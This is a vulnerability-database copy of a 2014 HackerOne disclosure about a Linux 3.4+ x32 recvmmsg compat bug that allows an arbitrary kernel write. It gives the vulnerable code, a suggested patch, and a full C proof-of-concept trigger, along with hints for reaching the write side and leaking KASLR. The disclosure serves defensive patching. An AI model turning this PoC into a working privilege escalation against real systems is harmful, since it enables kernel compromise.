Lucene search

K
hackeronePageexecH1:960
HistoryJan 28, 2014 - 11:52 p.m.

Sandbox Escape: Linux 3.4+: arbitrary write with CONFIG_X86_X32

2014-01-2823:52:58
pageexec
hackerone.com
$3000
26

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

0.4%

asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
                                    unsigned int vlen, unsigned int flags,
                                    struct compat_timespec __user *timeout)
{
        int datagrams;
        struct timespec ktspec;

        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

        if (COMPAT_USE_64BIT_TIME)
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT,
                                      (struct timespec *) timeout);
/*...*/

The timeout pointer parameter is provided by userland (hence the __user annotation) but for x32 syscalls it’s simply cast to a kernel pointer and is passed to __sys_recvmmsg which will eventually directly dereference it for both reading and writing. Other callers to __sys_recvmmsg properly copy from userland to the kernel first.

The impact is a sort of arbitrary kernel write-where-what primitive by unprivileged users where the to-be-written area must contain valid timespec data initially (the first 64 bit long field must be positive and the second one must be < 1G).

The bug was introduced by commit http://git.kernel.org/linus/ee4fa23c4b (other uses of COMPAT_USE_64BIT_TIME seem fine) and should affect all kernels since 3.4 (and perhaps vendor kernels if they backported x32 support along with this code). Note that CONFIG_X86_X32_ABI gets enabled at build time and only if CONFIG_X86_X32 is enabled and ld can build x32 executables.

Suggested fix:
Signed-off-by: PaX Team <pageexec@…email.hu>

--- a/net/compat.c  2014-01-20 12:36:54.372997752 +0100
+++ b/net/compat.c      2014-01-28 02:06:59.265506171 +0100
@@ -780,22 +780,25 @@
        if (flags & MSG_CMSG_COMPAT)
                return -EINVAL;

-       if (COMPAT_USE_64BIT_TIME)
-               return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
-                                     flags | MSG_CMSG_COMPAT,
-                                     (struct timespec *) timeout);
-
        if (timeout == NULL)
                return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                      flags | MSG_CMSG_COMPAT, NULL);

-       if (get_compat_timespec(&ktspec, timeout))
+       if (COMPAT_USE_64BIT_TIME) {
+               if (copy_from_user(&ktspec, timeout, sizeof(ktspec)))
+                       return -EFAULT;
+       } else if (get_compat_timespec(&ktspec, timeout))
                return -EFAULT;

        datagrams = __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
                                   flags | MSG_CMSG_COMPAT, &ktspec);
-       if (datagrams &gt; 0 && put_compat_timespec(&ktspec, timeout))
-               datagrams = -EFAULT;
+       if (datagrams &gt; 0) {
+               if (COMPAT_USE_64BIT_TIME) {
+                       if (copy_to_user(timeout, &ktspec, sizeof(ktspec)))
+                               datagrams = -EFAULT;
+               } else if (put_compat_timespec(&ktspec, timeout))
+                       datagrams = -EFAULT;
+       }

        return datagrams;
 }

So I couldn’t help it and created a simple PoC trigger based on the example in the manpage. As it is, it’ll just trigger a null-deref oops on the read side:

BUG: unable to handle kernel NULL pointer dereference at 0000000000000009 IP: [<ffffffff82a333cb>] __sys_recvmmsg+0x3b/0x310

By passing an appropriate value for the timeout pointer one can trigger the write side too. By the way, this also allows scanning the kernel address space and even reveal KASLR (try every 2MB, if no oops -> found the kernel), no doubt to Kees’ delight :).

/*
 * PoC trigger for the linux 3.4+ recvmmsg x32 compat bug, based on the manpage
 *
 * https://code.google.com/p/chromium/issues/detail?id=338594
 *
 * $ while true; do echo $RANDOM &gt; /dev/udp/127.0.0.1/1234; sleep 0.25; done
 */

#define _GNU_SOURCE
#include &lt;netinet/ip.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/syscall.h&gt;

#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
    int sockfd, retval, i;
    struct sockaddr_in sa;
    struct mmsghdr msgs[VLEN];
    struct iovec iovecs[VLEN];
    char bufs[VLEN][BUFSIZE+1];
    struct timespec timeout;

    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
    if (sockfd == -1) {
        perror("socket()");
        exit(EXIT_FAILURE);
    }

    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = htons(1234);
    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
        perror("bind()");
        exit(EXIT_FAILURE);
    }

    memset(msgs, 0, sizeof(msgs));
    for (i = 0; i &lt; VLEN; i++) {
        iovecs[i].iov_base         = bufs[i];
        iovecs[i].iov_len          = BUFSIZE;
        msgs[i].msg_hdr.msg_iov    = &iovecs[i];
        msgs[i].msg_hdr.msg_iovlen = 1;
    }

    timeout.tv_sec = TIMEOUT;
    timeout.tv_nsec = 0;

//    retval = recvmmsg(sockfd, msgs, VLEN, 0, &timeout);
//    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, &timeout);
    retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)1ul);
    if (retval == -1) {
        perror("recvmmsg()");
        exit(EXIT_FAILURE);
    }

    printf("%d messages received\n", retval);
    for (i = 0; i &lt; retval; i++) {
        bufs[i][msgs[i].msg_len] = 0;
        printf("%d %s", i+1, bufs[i]);
    }
    exit(EXIT_SUCCESS);
}

6.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:M/Au:N/C:C/I:C/A:C

0.0004 Low

EPSS

Percentile

0.4%